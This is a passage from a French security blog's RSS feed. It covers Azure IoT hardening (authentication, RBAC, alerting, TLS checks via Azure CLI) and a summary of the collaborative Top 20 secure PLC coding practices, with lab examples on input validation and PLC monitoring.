<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20217 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image9.png" alt="" width="907" height="127" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image9.png 907w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image9-437x61.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image9-71x10.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image9-768x108.png 768w" sizes="auto, (max-width: 907px) 100vw, 907px" /></p>
<p style="text-align: justify;">Le <strong>portail d’Azure</strong> permet également d’effectuer cette vérification :</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20208 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image5.png" alt="" width="580" height="317" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image5.png 580w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image5-349x191.png 349w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image5-71x39.png 71w" sizes="auto, (max-width: 580px) 100vw, 580px" /></p>
<p style="text-align: justify;">Le choix du moyen d&rsquo;authentification pour Azure IoT <strong>dépendra des exigences de sécurité</strong> de votre solution. Si vous avez besoin d&rsquo;une <strong>sécurité élevée</strong> et que vous avez une infrastructure pour gérer les certificats, alors l’authentification par <strong>certificat X.509</strong> est une bonne option. Cependant, si vous recherchez une <strong>solution simple à gérer et à utiliser</strong>, le <strong>jeton SAS </strong>pourrait être plus adapté à vos besoins.</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">2<sup>ème</sup> vecteur de sécurisation : RBAC et alertes</h1>
<p style="text-align: justify;">L’assignement des rôles sur votre infrastructure Azure IoT doit être <strong>réfléchi et défini selon les besoins des utilisateurs</strong>. Une définition de rôles et de permissions précise permet de <strong>limiter l’accès aux ressources</strong> et aux divers fonctionnalités disponibles sur la plateforme. Les différents services Azure IoT fournissent une <strong>multitude de rôles préconfigurés</strong> qui peuvent être adaptés à vos besoins et à votre organisation. Ensuite, <strong>appliquer le principe du moindre privilège</strong>, et limiter le nombre de comptes disposant de privilèges importants, permet d’<strong>améliorer le niveau de sécurité</strong> de votre infrastructure Azure IoT.</p>
<p style="text-align: justify;"><strong>Azure CLI</strong> permet notamment de <strong>lister les utilisateurs possédant des droits sur la ressource Azure IoT souhaitée</strong>, ainsi que leurs rôles associés. La commande suivante permet de réaliser cette action :</p>
<table style="border-collapse: collapse; width: 100%; height: 129px;">
<tbody>
<tr style="height: 129px;">
<td style="width: 100%; background-color: #002060; border-color: #002060; border-style: solid; height: 129px;">
<p><span style="color: #ffffff;"><span style="color: #ffff00;"><span style="color: #33cccc;"><span style="color: #ffff00;">az</span> <span style="color: #ffffff;">role assignment list</span> <span style="color: #808080;">&#8211;scope</span> « /subscriptions/&lt;ID_de_souscription&gt;/resourceGroups/&lt;Resource_Group&gt;/providers/Microsoft.Devices/IotHubs/&lt;IoT_Hub&gt; » <span style="color: #808080;">&#8211;include-inherited</span></span></span></span></p>
</td>
</tr>
</tbody>
</table>
<p style="text-align: justify;">Il est possible d’utiliser des sélecteurs de chaînes de caractères (<em>Select-String</em> pour <strong>Powershell</strong>, <em>grep</em> pour <strong>Bash</strong>) afin de ne récupérer que les informations souhaitées.</p>
<p style="text-align: justify;">Dans l’exemple ci-dessous, les <strong>noms</strong>, <strong>types</strong> et <strong>rôles</strong> ont été les seuls éléments récupérés à l’aide de <em>Select-String </em>:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20220 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image10.png" alt="" width="852" height="802" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image10.png 852w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image10-203x191.png 203w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image10-41x39.png 41w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image10-768x723.png 768w" sizes="auto, (max-width: 852px) 100vw, 852px" /></p>
<p style="text-align: justify;">La fonction des rôles intégrés Azure est disponible à <a href="https://learn.microsoft.com/fr-fr/azure/role-based-access-control/built-in-roles">cette page</a>.</p>
<p style="text-align: justify;">De plus, la configuration d’<strong>alertes basées sur les métriques</strong> de vos services Azure IoT est un autre outil à prendre en compte. Des alertes peuvent être configurées pour détecter des comportements suspects ou des anomalies, et ainsi <strong>permettre une investigation rapide</strong> sur votre infrastructure. Azure met à la disposition de ses clients une large collection de <em>signaux </em>permettant de définir des conditions d’alertes. Il est également possible de <strong>définir des signaux d’alertes customisés</strong> via le langage de requête utilisé par <em>Azure Log Analytics</em>.</p>
<p style="text-align: justify;">Le <strong>Portail Azure</strong> est le moyen le plus facile pour mettre en place des alertes basées sur les données collectées par le IoT Hub. Par exemple, pour définir une règle d’alerte de journal, il faut :</p>
<ol style="text-align: justify;">
<li>Aller sur la page de management du IoT Hub souhaité ;</li>
<li>Aller dans la sous-catégorie <em>Logs</em> de la catégorie <em>Monitoring</em>;</li>
<li>Choisir une règle en utilisant le langage de <em>Azure Log Analytics </em>;</li>
<li>Ajouter une règle d’alerte liée à cette requête ;</li>
<li>Choisir l’opérateur, l’unité, la valeur seuil, la récurrence de vérification et la période concernée par la règle.</li>
</ol>
<p style="text-align: justify;">Ces actions sont résumées par les captures d’écran ci-dessous :</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20210 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image6.png" alt="" width="909" height="244" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image6.png 909w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image6-437x117.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image6-71x19.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image6-768x206.png 768w" sizes="auto, (max-width: 909px) 100vw, 909px" /></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20212 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image7.png" alt="" width="824" height="603" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image7.png 824w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image7-261x191.png 261w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image7-53x39.png 53w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image7-768x562.png 768w" sizes="auto, (max-width: 824px) 100vw, 824px" /></p>
<p style="text-align: justify;">Il suffira ensuite de choisir un <strong>groupe d’action</strong> lié à un type d’action (envoi de mail, de SMS, etc.).</p>
<p style="text-align: justify;">L’exemple donné entrainera une action si le nombre de connexions échouées d’objets connectés à l’IoT Hub concerné dépasse les 10 échecs en 10 minutes ou moins.</p>
<p style="text-align: justify;">En complément, <a href="https://learn.microsoft.com/fr-fr/azure/azure-monitor/alerts/tutorial-log-alert">un guide détaillé</a> prenant la forme d’un tutoriel est disponible sur la documentation Azure. Il est à noter que ce service est payant en supplément.</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">3<sup>ème</sup> vecteur de sécurisation : le service en lui même</h1>
<p style="text-align: justify;">Enfin, la<strong> mise en place d’une configuration adéquate</strong> des services Azure IoT est un autre élément clé pour améliorer le niveau de maturité cyber de la plateforme. Cela inclut des options telles que par exemple les <strong>règles de routage</strong> ou encore paramétrer la version minimum de TLS utilisé par les appareils pour se connecter sur <em>Azure IoT Hub</em>.</p>
<p style="text-align: justify;">Les <strong>règles de routage</strong> sont utilisées pour <strong>rediriger les messages</strong> des appareils IoT vers un <em>point de terminaison</em> (stockage, services, base de données, etc.) et sont paramétrables par des <em>requêtes de routage</em>. Il est recommandé de <strong>filtrer les messages entrants</strong>, via les requêtes de routage, afin d’augmenter la sécurité de votre solution IoT.</p>
<p style="text-align: justify;">La <strong>vérification de la version minimale de TLS acceptée</strong> peut être faite à l’aide d’<strong>Azure CLI</strong> : en effet, un IoT Hub possède l’attribut <em>minTlsVersion</em> permettant de contrôler cette propriété. Cette vérification est réalisée à l’aide de la commande suivante :</p>
<table style="border-collapse: collapse; width: 100%;">
<tbody>
<tr>
<td style="width: 100%; background-color: #002060; border-color: #002060; border-style: solid;">
<p><span style="color: #ffffff;"><span style="color: #ffff00;">az <span style="color: #ffffff;">resource show <span style="color: #808080;">&#8212;resource-group</span> &lt;Resource_Group&gt; <span style="color: #808080;">-n</span> &lt;IoT_Hub&gt; <span style="color: #808080;">&#8211;resource-type</span> Microsoft.Devices/IotHubs | <span style="color: #ffff00;">Select-String</span> <span style="color: #33cccc;">« minTlsVersion »</span></span></span></span></p>
</td>
</tr>
</tbody>
</table>
<p style="text-align: justify;">Si cette commande <strong>ne retourne rien</strong>, ou retourne <strong>une valeur inférieure à 1.2</strong>, alors la configuration <strong>n’est pas satisfaisante</strong>.</p>
<p style="text-align: justify;">Le <strong>portail d’Azure</strong> permet également d’effectuer cette vérification :</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20214 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image8.png" alt="" width="668" height="315" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image8.png 668w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image8-405x191.png 405w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image8-71x33.png 71w" sizes="auto, (max-width: 668px) 100vw, 668px" /></p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">En synthèse</h1>
<p style="text-align: justify;"><strong>La sécurité est un enjeu majeur pour les projets IoT</strong> : Microsoft, avec son produit Azure IoT, fournit une plateforme IoT répondant à une majorité des besoins IoT, et ce de manière sécurisée, sous couvert d’en faire la bonne configuration. Au cours de cette article, nous avons abordé<strong> des recommandations permettant d’améliorer le niveau de sécurité</strong> de votre infrastructure Azure IoT.</p>
<p style="text-align: justify;">Il est important de garder en tête que <strong>d’autres vecteurs d’attaques existent</strong>, tels que les vulnérabilités matérielles et logicielles ainsi que les réseaux utilisés par les dispositifs IoT.  En somme, la sécurité d’une infrastructure IoT est un <strong>défi complexe qui nécessite une approche de bout en bout</strong><strong>.</strong></p>
<p style="text-align: justify;"><strong> </strong></p>
<p style="text-align: justify;"> </p>
<p style="text-align: center;"><em>Avec la participation de Marius ANDRE</em></p>
<p style="text-align: justify;">[1] “Magic Quadrant for Global Industrial IoT Platforms”</p>
<p style="text-align: justify;"><a href="https://www.gartner.com/doc/reprints?id=1-2BQFX3BJ&amp;ct=221116&amp;st=sb">https://www.gartner.com/doc/reprints?id=1-2BQFX3BJ&amp;ct=221116&amp;st=sb</a></p>
<p style="text-align: justify;">[2] “Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL) Profile”</p>
<p style="text-align: justify;"><a href="https://www.rfc-editor.org/rfc/rfc5280">https://www.rfc-editor.org/rfc/rfc5280</a></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2023/04/ameliorer-la-securite-de-son-infrastructure-iot-conseils-de-configuration-et-bonnes-pratiques-sur-azure-iot/">Améliorer la sécurité de son infrastructure IoT : conseils de configuration et bonnes pratiques sur Azure IoT</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2023/04/ameliorer-la-securite-de-son-infrastructure-iot-conseils-de-configuration-et-bonnes-pratiques-sur-azure-iot/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Top 20 Secure PLC Coding Practices</title>
		<link>https://www.riskinsight-wavestone.com/2022/11/top-20-secure-plc-coding-practices/</link>
					<comments>https://www.riskinsight-wavestone.com/2022/11/top-20-secure-plc-coding-practices/#respond</comments>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Mon, 07 Nov 2022 16:00:00 +0000</pubDate>
				<category><![CDATA[Eclairage]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[code]]></category>
		<category><![CDATA[PLC]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=18952</guid>

					<description><![CDATA[<p>Si vous travaillez dans la cybersécurité, vous avez probablement entendu parler de l’OWASP TOP 10: un document de sensibilisation à la sécurité des applications web qui présente les 10 familles de vulnérabilités les plus fréquentes. Cependant, dans le domaine des...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2022/11/top-20-secure-plc-coding-practices/">Top 20 Secure PLC Coding Practices</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;">Si vous travaillez dans la cybersécurité, vous avez probablement entendu parler de l’<a href="https://owasp.org/Top10/">OWASP TOP 10</a>: un document de sensibilisation à la sécurité des applications web qui présente les 10 familles de vulnérabilités les plus fréquentes.</p>
<p style="text-align: justify;">Cependant, dans le domaine des SI industriels, on ne parle quasiment jamais de la sécurité du code automate qui contrôle le procédé industriel. Pourquoi ?</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">Genèse du projet</h1>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">Le projet a débuté avec la présentation de <a href="https://www.youtube.com/watch?v=JtsyyTfSP1I">Jake Browdsky lors de la conférence S4</a> en 2019 </p>
<p style="text-align: justify;">Dans cette conférence, le concept de sécurisation du processus industriel par l&rsquo;application de pratiques de programmation sécurisée dans le code de l&rsquo;automate est discuté et plusieurs exemples sont mentionnés.</p>
<p style="text-align: justify;">Cette idée a ensuite été transformée en un projet collaboratif par Sarah Fluchs et Vivek Ponnada, auquel plus de 900 personnes ont contribué avec leurs idées !</p>
<p style="text-align: justify;"><a href="https://www.youtube.com/watch?v=JtsyyTfSP1I"><img loading="lazy" decoding="async" class="aligncenter wp-image-18967 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image6.png" alt="" width="703" height="395" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image6.png 703w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image6-340x191.png 340w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image6-69x39.png 69w" sizes="auto, (max-width: 703px) 100vw, 703px" /></a></p>
<h1 style="text-align: justify;"> </h1>
<h1 style="text-align: justify;">Automates Programmables Industriels</h1>
<p style="text-align: justify;">Les automates programmables industriels (<em>Programmable Logic Controller</em> en anglais) sont situés au cœur de l&rsquo;automatisation, au niveau 1 du modèle de Purdue.</p>
<p style="text-align: center;"><img loading="lazy" decoding="async" class="aligncenter wp-image-18957 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image1.png" alt="" width="624" height="351" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image1.png 624w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image1-340x191.png 340w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image1-69x39.png 69w" sizes="auto, (max-width: 624px) 100vw, 624px" /><em>Représentation ISA du modèle de Purdue</em></p>
<p style="text-align: center;"><a href="https://dale-peterson.com/2019/02/11/is-the-purdue-model-dead/https:/dale-peterson.com/2019/02/11/is-the-purdue-model-dead/">Le modèle de Purdue est-il mort ? &#8211; Dale Peterson : ICS Security Catalyst (dale-peterson.com)</a></p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">Les automates programmables sont des ordinateurs embarqués avec un système temps-réel qui interagissent directement avec les capteurs et les actionneurs pour surveiller et contrôler une partie du processus industriel.</p>
<p style="text-align: justify;">Ils exécutent une boucle infinie, composée de 4 étapes :</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-18959 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image2.png" alt="" width="458" height="323" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image2.png 458w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image2-271x191.png 271w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image2-55x39.png 55w" sizes="auto, (max-width: 458px) 100vw, 458px" /></p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">La « logique », ou code de l&rsquo;automate, peut être écrite dans différents langages, tels que définis dans la norme CEI 61131-3 :</p>
<ul style="text-align: justify;">
<li>Ladder Diagram</li>
<li>Function Block Diagram</li>
<li>Structured Text</li>
<li>Instruction List [désormais obsolète]</li>
<li>Sequential Function Chart</li>
</ul>
<h1> </h1>
<h1 style="text-align: justify;">Le document TOP20</h1>
<p> </p>
<p style="text-align: justify;">Le document TOP20 est le résultat des échanges en ligne visant à identifier les 20 pratiques de programmation les plus importantes et peut être téléchargé sur le <a href="https://plc-security.com/">site du projet</a>.</p>
<p style="text-align: justify;">Comme le TOP10 de l&rsquo;OWASP, il ne vise pas à décrire toutes les pratiques de programmation sécurisée possibles, du moins pour le moment.</p>
<p style="text-align: justify;">Chacune des pratiques du TOP20 est détaillée avec les mêmes informations :</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-18961 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image3.png" alt="" width="975" height="498" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image3.png 975w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image3-374x191.png 374w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image3-71x36.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image3-768x392.png 768w" sizes="auto, (max-width: 975px) 100vw, 975px" /></p>
<p> </p>
<p style="text-align: justify;">Les 20 pratiques peuvent être organisées en trois catégories principales :</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-18963 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image4.png" alt="" width="624" height="323" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image4.png 624w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image4-369x191.png 369w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image4-71x37.png 71w" sizes="auto, (max-width: 624px) 100vw, 624px" /></p>
<p style="text-align: justify;"> </p>
<h1> </h1>
<h1 style="text-align: justify;">Quelques exemples</h1>
<p> </p>
<p style="text-align: justify;">Voyons un exemple de chaque catégorie. Pour cela, nous utiliserons un automate d&rsquo;entrée de gamme de notre laboratoire, un feu de signalisation ainsi qu&rsquo;une supervision SCADA.</p>
<p style="text-align: justify;">Malheureusement, chaque fournisseur d&rsquo;automates &#8211; et même chaque famille d&rsquo;automates &#8211; utilise son propre logiciel de programmation ; les exemples présentés ici ne peuvent donc pas être copiés-collés dans le code d&rsquo;une autre marque d&rsquo;automates et nécessiteront une implémentation différente.</p>
<p style="text-align: justify;">Le code de l&rsquo;automate ainsi que le projet SCADA utilisé pour la démonstration peuvent être téléchargés depuis notre <a href="https://github.com/wavestone-cdt/plc-code-security">page github</a>.</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Règle n°13 : Désactiver les ports et protocoles de communication inutiles / inutilisés</h2>
<p style="text-align: justify;">Cette pratique consiste à durcir l&rsquo;automate. La plupart des automates d&rsquo;aujourd&rsquo;hui offrent un support pour plusieurs protocoles industriels, ainsi qu&rsquo;une variété de services supplémentaires comme un serveur de fichier FTP, un serveur web et bien d&rsquo;autres.</p>
<p style="text-align: justify;">Désactiver les services non utilisés et renforcer la sécurité de ceux qui sont activés (changer les identifiants par défaut, etc.) est une étape nécessaire pour réduire la surface d&rsquo;attaque et, par conséquent, limiter le nombre de correctifs de sécurité à appliquer à l&rsquo;avenir (moins il y a de fonctionnalités activées, plus les vulnérabilités sont pertinentes, facilitant l’effort pour les corriger).</p>
<p style="text-align: justify;"><em>Jetons un coup d&rsquo;œil à la vidéo :</em></p>
<p style="text-align: justify;"><a href="https://youtu.be/uFhJaOEXh5w"><img loading="lazy" decoding="async" class="aligncenter wp-image-18972 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-093944.png" alt="" width="1279" height="724" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-093944.png 1279w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-093944-337x191.png 337w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-093944-69x39.png 69w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-093944-768x435.png 768w" sizes="auto, (max-width: 1279px) 100vw, 1279px" /></a></p>
<h2> </h2>
<h2 style="text-align: justify;">Règles n°6 et n°8 : Vérification des entrées au niveau de l&rsquo;automate.</h2>
<p style="text-align: justify;">Ces deux règles peuvent être démontrées dans le même exemple car elles suivent le même principe : ne pas faire aveuglément confiance aux entrées externes ! Pour quelqu&rsquo;un comme moi qui a fait sa part de test d’intrusion d&rsquo;applications web, je ne pourrais être plus d&rsquo;accord !</p>
<p style="text-align: justify;">Les plages valides pour les valeurs d&rsquo;entrée sont souvent mises en œuvre au niveau SCADA, laissant la possibilité à un attaquant d&rsquo;écrire directement une valeur hors plage dans le bon registre de l&rsquo;automate.</p>
<p style="text-align: justify;">Cela est particulièrement vrai pour les compteurs et les chronomètres, qui doivent être vérifiés pour s&rsquo;assurer qu&rsquo;ils sont supérieurs ou égaux à zéro, et que la valeur est inférieure à une limite supérieure qui a du sens pour le processus.</p>
<p style="text-align: justify;"><em>Jetons un coup d&rsquo;œil à la vidéo :</em></p>
<p style="text-align: justify;"><a href="https://youtu.be/Rut6evMsvXA"><img loading="lazy" decoding="async" class="aligncenter wp-image-18974 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094045.png" alt="" width="1285" height="715" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094045.png 1285w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094045-343x191.png 343w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094045-71x39.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094045-768x427.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094045-1170x650.png 1170w" sizes="auto, (max-width: 1285px) 100vw, 1285px" /></a></p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Surveillance de l&rsquo;automate programmable règles n°2 et n°5</h2>
<p style="text-align: justify;">Nous pouvons exploiter les données opérationnelles de l&rsquo;automate pour essayer de détecter des situations anormales qui pourraient être des incidents de cybersécurité.</p>
<h3 style="text-align: justify;">État de l&rsquo;automate</h3>
<p style="text-align: justify;">S&rsquo;assurer que l&rsquo;automate est en mode « RUN » est essentiel pour la sûreté et la sécurité des opérations. Un automate à l&rsquo;arrêt pourrait empêcher l&rsquo;IHM SCADA d&rsquo;afficher les bonnes informations à l&rsquo;opérateur, ce qui entraînerait de mauvaises décisions.</p>
<p style="text-align: justify;">De même, des fonctions telles que le « forçage » des entrées et des sorties peuvent empêcher l&rsquo;IHM SCADA d&rsquo;afficher l&rsquo;état réel du processus, et doivent être détectées et clairement affichées à l&rsquo;opérateur.</p>
<p style="text-align: justify;"><em>Jetons un coup d&rsquo;œil à la vidéo :</em></p>
<p style="text-align: justify;"><a href="https://youtu.be/_Ta35tFAWyY"><img loading="lazy" decoding="async" class="aligncenter wp-image-18976 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094122.png" alt="" width="1278" height="721" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094122.png 1278w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094122-339x191.png 339w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094122-69x39.png 69w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094122-768x433.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094122-800x450.png 800w" sizes="auto, (max-width: 1278px) 100vw, 1278px" /></a></p>
<p style="text-align: justify;">Cette technique peut également être utilisée pour détecter les automates en mode « PROGRAM », ce qui permet de programmer l&rsquo;automate à distance.</p>
<p> </p>
<h3 style="text-align: justify;">Firmware de l&rsquo;automate et version du code</h3>
<p style="text-align: justify;">Ne serait-il pas formidable de pouvoir interroger la version du firmware de votre automate directement à partir d&rsquo;un registre Modbus ? Eh bien, c&rsquo;est possible !</p>
<p style="text-align: justify;">En outre, sur notre automate, nous pouvons également obtenir une somme de contrôle du code de l&rsquo;automate, ce qui signifie que nous pouvons détecter si quelqu&rsquo;un a altéré le code de l&rsquo;automate, déclencher une alarme et enquêter si nous ne pouvons pas faire correspondre cela à une entrée dans le registre de gestion des modifications.</p>
<p style="text-align: justify;"><em>Jetons un coup d&rsquo;œil à la vidéo :</em></p>
<p style="text-align: justify;"><a href="https://youtu.be/E9Ml2kVWgDM"><img loading="lazy" decoding="async" class="aligncenter wp-image-18978 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094352.png" alt="" width="663" height="630" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094352.png 663w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094352-201x191.png 201w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Screenshot-2022-11-07-094352-41x39.png 41w" sizes="auto, (max-width: 663px) 100vw, 663px" /></a></p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;"> </h1>
<h1 style="text-align: justify;">Alors, que pouvez-vous faire ?</h1>
<p style="text-align: justify;">Le document sur le top 20 est facilement disponible, mais comment l&rsquo;utiliser ?</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-18965 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image5.png" alt="" width="624" height="325" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image5.png 624w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image5-367x191.png 367w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/11/Image5-71x37.png 71w" sizes="auto, (max-width: 624px) 100vw, 624px" /></p>
<p style="text-align: justify;">Si vous souhaitez en savoir plus sur la sécurité du code automate, vous pouvez également consulter le contenu que nous avons présenté lors de nos ateliers à <a href="https://github.com/wavestone-cdt/plc-code-security/tree/main/dc30">DEFCON</a> et <a href="https://github.com/wavestone-cdt/plc-code-security/tree/main/brucon0x0E">BruCON</a> sur notre page <a href="https://github.com/wavestone-cdt/plc-code-security">Github</a>.</p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2022/11/top-20-secure-plc-coding-practices/">Top 20 Secure PLC Coding Practices</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2022/11/top-20-secure-plc-coding-practices/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>L’été cybersécurité de Wavestone</title>
		<link>https://www.riskinsight-wavestone.com/2022/10/lete-cybersecurite-de-wavestone/</link>
					<comments>https://www.riskinsight-wavestone.com/2022/10/lete-cybersecurite-de-wavestone/#respond</comments>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Fri, 14 Oct 2022 08:00:00 +0000</pubDate>
				<category><![CDATA[Eclairage]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[camp]]></category>
		<category><![CDATA[hackers]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=18801</guid>

					<description><![CDATA[<p>Cette année encore, nous avons été ravis de pouvoir partager nos connaissances lors du Hacker Summer camp (conférences sur la cybersécurité qui se déroulent à peu près en même temps chaque année à Las Vegas : BlackHat, BSides Las Vegas...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2022/10/lete-cybersecurite-de-wavestone/">L’été cybersécurité de Wavestone</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;"><em>Cette année encore, nous avons été ravis de pouvoir partager nos connaissances lors du Hacker Summer camp (conférences sur la cybersécurité qui se déroulent à peu près en même temps chaque année à Las Vegas : BlackHat, BSides Las Vegas et DEFCON).</em></p>
<p style="text-align: justify;"><em>(Thomas est absent sur cette photo car il a déjà quitté DEFCON pour participer au SANS DFIR Summit à Houston, Texas).</em></p>
<p style="text-align: justify;"><em>Dans cet article, nous partageons les supports &amp; code utilisés pour nos conférences, ateliers et démonstrations d&rsquo;outils.</em></p>
<h2 style="text-align: justify;"> </h2>
<h2 style="text-align: justify;">CI/CD security</h2>
